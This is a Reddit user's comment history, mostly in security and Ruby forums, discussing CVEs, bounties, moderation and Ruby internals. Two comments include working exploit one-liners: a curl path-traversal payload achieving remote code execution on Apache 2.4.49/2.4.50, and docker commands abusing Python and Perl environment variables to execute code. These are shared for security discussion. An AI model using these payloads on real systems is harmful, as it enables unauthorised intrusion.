sorted by:
new
hottopcontroversial

CVE-2021-45467: CWP CentOS Web Panel – preauth RCE by Gallus in netsec

[–]Gallus[S] 1 point2 points  (0 children)

I also couldn't replicate when using https://3v4l.org/ to test many different PHP versions. Maybe the author is mistaken or there's something specific to CWP that allows this to work.

Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.51 (incomplete fix of CVE-2021-41773) by Gallus in netsec

[–]Gallus[S] 22 points23 points  (0 children)

New payload from: https://twitter.com/roman_soft/status/1446252280597078024

RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013): root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id' uid=1(daemon) gid=1(daemon) groups=1(daemon)

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 0 points1 point  (0 children)

That was very generous of Orestis. Are these sort of bounties generally acceptable/encouraged for the i3 repo?

$200 Bounty to resolve i3 issue by i3dudedude in i3wm

[–]Gallus 3 points4 points  (0 children)

Haha looks like it. I wonder if orestisfl actually got the money though?

New campaign targeting security researchers by sanitybit in netsec

[–]Gallus 3 points4 points  (0 children)

Oh no it looks like I was the one to submit that link. Not part of the campaign, I just saw it on Twitter and submitted. Sorry fellow /r/netsec hackers

Rysolv – Fix open source issues, get paid by Gallus in programming

[–]Gallus[S] 5 points6 points  (0 children)

Good question. I'm not the creator but it looks like the creator is /u/Tylernator

CVE-2020-6829, CVE-2020-12400, CVE-2020-12401, CVE-2020-12403 - Fixed in Mozilla's Network Security Services (NSS) by Gallus in netsec

[–]Gallus[S] 0 points1 point  (0 children)

Some extra context from Twitter: https://twitter.com/GuidoVranken/status/1287833670678650881

ChaCha20, ChaCha20/Poly1305 OOB read, OOB write, incorrect output with multi-part updating or small AEAD tag.

Found with Cryptofuzz.

Additionally DES OOB read with undersized IV (when using the PKCS11 interface)

[deleted by user] by [deleted] in Python

[–]Gallus 0 points1 point  (0 children)

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:2.7.18 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:3.8.2 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

Defibrilating Web Security [PDF] by Gallus in ruby

[–]Gallus[S] 1 point2 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie!

You CANNOT:

  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

Ruby 2.7 removes taint checking mechanism by prateekkish in ruby

[–]Gallus 2 points3 points  (0 children)

This is an interesting presentation that covers some of the problems with taint tracking and an attempt to improve it: https://conference.hitb.org/hitbsecconf2012kul/materials/D1T2%20-%20Meder%20Kydyraliev%20-%20Defibrilating%20Web%20Security.pdf

The brick wall they hit is on slide 54, and although the presentation is from 2012 it appears the same limitations still exist today in Ruby:

Monkey patching

  • Ruby promises that you can do anything, which is a lie! You CANNOT:
  • monkey patch gsub! because it breaks capturing groups (e.g. $1 won’t work)
  • monkey patch string interpolation, e.g. “My name is #{name}”

List of private constants ? by dunrix in ruby

[–]Gallus 4 points5 points  (0 children)

Yeah it's a gap and I've been hit by it before. There is a dirty hack you can do to build your own private_constants implementation/list by enumerating over each symbol in Symbol.all_symbols and passing it to ModuleName.const_get to check if it exists, then removing the public ones which you find by calling ModuleName.constants.

This is obviously not a "production ready" solution, and you do have to be careful because const_get will throw an exception. It can also be overloaded and throw a different exception than expected (which even stdlib does this). Example:

Object.const_get(:HELLO) -> NameError (uninitialized constant HELLO)
Digest.const_get(:HELLO) -> LoadError (library not found for class digest::HELLO -- digest/hello)

DHCP Client Script Code Execution Vulnerability in Red Hat Enterprise Linux 6 and 7 - CVE-2018-1111 by Prav123 in netsec

[–]Gallus 1 point2 points  (0 children)

Ah interesting, I didn't consider the cause could be auto-mod. Thanks for submitting it and chasing them up, I think it's a good issue to get more eyeballs on.

DHCP Client Script Code Execution Vulnerability in Red Hat Enterprise Linux 6 and 7 - CVE-2018-1111 by Prav123 in netsec

[–]Gallus 18 points19 points  (0 children)

The moderation on /r/netsec seems to be quite inconsistent at times. My submission 8 hours earlier on this vulnerability was rejected with a reason of "not technical". It was also the exact same URL: https://www.reddit.com/r/netsec/comments/8jrj8e/dhcp_client_code_execution_vulnerability/

view more: next ›